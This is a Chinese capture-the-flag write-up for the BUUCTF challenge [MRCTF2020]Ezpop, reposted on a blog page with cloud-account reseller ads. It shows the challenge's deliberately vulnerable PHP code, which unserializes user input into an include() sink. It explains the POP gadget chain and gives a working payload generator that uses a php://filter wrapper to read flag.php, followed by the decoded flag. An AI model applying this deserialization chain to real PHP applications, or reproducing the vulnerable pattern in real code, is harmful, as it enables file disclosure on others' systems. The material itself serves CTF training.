BUUCTF: [MRCTF2020]Ezpop

阿里云国内75折回扣微信号：monov8

阿里云国际，腾讯云国际，低至75折。AWS 93折免费开户实名账号代冲值优惠多多微信号：monov8 飞机：@monov6

https://buuoj.cn/challenges#[MRCTF2020]Ezpop

BUUCTF: [MRCTF2020]Ezpop_方法调用

<?php
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

POP链

include($value)<-Modifier::append()<-Modifier::__invoke()<-Test::__get()<-Show::__toString()<-Show::__wakeup()

根据题目信息知道flag.php在当前目录，而整个题目只有include($value)是有办法通过php伪协议读取到flag.php，从Modifier::append()反推。Modifier::__invoke()会调用Modifier::append()，而Modifier::__invoke()的触发条件是把实例对象当作方法调用。很明显，如果把实例对象赋给Test::p时，Test::__get()会触发Modifier::__invoke()。

Test::__get()的触发条件是调用不可访问的属性或者方法，能做到的只有Show::__toString()，只需要$this->str=new Test()，即可触发Test::__get()。而Test::__toString()的触发条件这里只有preg_match()，Test::__construct()限定了形参为字符型，如果Show::__construct($file)可以传对象，echo 'Welcome to '.$this->source."<br>";应该也会触发Show::__toString。

<?php 
class Modifier {
    protected  $var = 'php://filter/read=convert.base64-encode/resource=./flag.php';
}

class Show{
    public $source;
    public $str;
}

class Test{
    public $p;
}
$show = new Show();
$show->source = new Show();
$show->source->str = new Test();
$show->source->str->p = new Modifier();

echo urlencode(serialize($show));
 ?>

BUUCTF: [MRCTF2020]Ezpop_方法调用_02

PS C:\Users\Administrator\Desktop> php -r "var_dump(base64_decode('PD9waHAKY2xhc3MgRmxhZ3sKICAgIHByaXZhdGUgJGZsYWc9ICJmbGFne2VmMmVjOWE3LWI3YjUtNGVhYy04MWMwLTU1NjJlN2ExODUwZn0iOwp9CmVjaG8gIkhlbHAgTWUgRmluZCBGTEFHISI7Cj8+'));"
Command line code:1:
string(114) "<?php
class Flag{
    private $flag= "flag{ef2ec9a7-b7b5-4eac-81c0-5562e7a1850f}";
}
echo "Help Me Find FLAG!";
?>"

阿里云国内75折回扣微信号：monov8

阿里云国际，腾讯云国际，低至75折。AWS 93折免费开户实名账号代冲值优惠多多微信号：monov8 飞机：@monov6

返回列表

上一篇：网安研发之初识抽象语法树

下一篇：2022DASCTF Apr X FATE 防疫挑战赛 Writeup

“BUUCTF: [MRCTF2020]Ezpop” 的相关文章

6.深度学习和计算1年前 (2023-02-02)

(隐私计算)联邦学习概述1年前 (2023-02-02)

字符串不可变1年前 (2023-02-02)

dotnet 警惕使用 StackTrace 加获取方法标记 Attribute 特性在 Release 下被内联1年前 (2023-02-02)

【FAQ】申请Health Kit权限的常见问题及解答1年前 (2023-02-02)

终端读取iOS项目所有设置参数（版本号、应用名等）1年前 (2023-02-02)

使用动态输出打印内核的DEBUG信息1年前 (2023-02-02)

HGAME2023_WP_WEEK21年前 (2023-02-02)

Keepalived高可用集群部署1年前 (2023-02-02)

JS闭包和作用域（必学知识点总结）1年前 (2023-02-02)

BUUCTF: [MRCTF2020]Ezpop

“BUUCTF: [MRCTF2020]Ezpop” 的相关文章

阿里云国际版